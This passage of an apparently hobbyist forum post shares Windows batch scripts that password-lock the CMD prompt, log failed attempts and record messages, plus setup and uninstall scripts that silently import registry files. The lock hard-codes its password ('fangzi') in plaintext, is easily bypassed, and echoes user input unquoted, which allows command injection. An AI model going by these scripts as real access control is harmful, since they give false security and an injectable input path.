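if "%pwd%"=="fangzi" goto pass
echo ***** Wrong password, please try again.   You have %times% attempts left *****
echo.
if %times%==0 goto close
echo  Status: password entered, verification failed               Time:%time% >> e:\CMD\mylog.txt
goto password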

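:close
echo  Status: wrong password entered 3 times, program locked        Time:%time% >> e:\CMD\mylog.txt
title Sorry, you cannot use [Angle]'s CMD
echo --------------------------------------------------------------------------------
echo  Password verification failed 3 times, so the program is locked and you cannot
echo  continue. You may close this window, or leave a message for [Angle]:
echo  type your message and press Enter to submit it!
echo --------------------------------------------------------------------------------
echo                                [ MESSAGES ]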

:message
echo ________________________________________________________________________________
set /p msg= Enter your message:
echo. >> e:\CMD\mymsg.txt
echo ####################################################################### >> e:\CMD\mymsg.txt
echo Date:%date%       Time:%time% >> e:\CMD\mymsg.txt
echo Message: >> e:\CMD\mymsg.txt
echo           %msg% >> e:\CMD\mymsg.txt
rem The original wrote this blank line to c:\message.txt; mymsg.txt is where messages are kept.
echo. >> e:\CMD\mymsg.txt
echo     ...... OK ......
echo   Your message has been recorded. You may close the window or leave another message.
echo  Action: user left a message                    Time:%time% >> e:\CMD\mylog.txt
goto message

:pass
echo  Status: program unlocked, welcome      Time:%time% >> e:\CMD\mylog.txt
title [Angle]'s CMD
ENDLOCAL

-----------------------------------------------------------------

The following is setup.bat

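@echo off
rem Copy lock.bat into the Windows directory, then import lock.reg (not shown in this post).
copy /y lock.bat "%windir%\lock.bat"
echo lock.bat installed successfully
regedit /s lock.reg
echo lock.reg registered successfully
-----------------------------------------------------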

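File used for uninstalling
The following is the uninstall script, which imports unlock.reg

@echo off
rem Delete only the installed copy; the original line also deleted lock.bat from the current directory.
del /f "%windir%\lock.bat"
echo lock.bat deleted successfully
regedit /s unlock.reg
echo lock.reg unregistered successfully

------------------------------------------------------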

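Double-click setup.bat to install!

When using CMD, the password is fangzi (all lowercase; the password is case-sensitive)
All logs are stored in E:\CMD\mylog.txt
All messages are stored in E:\CMD\mymsg.txt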
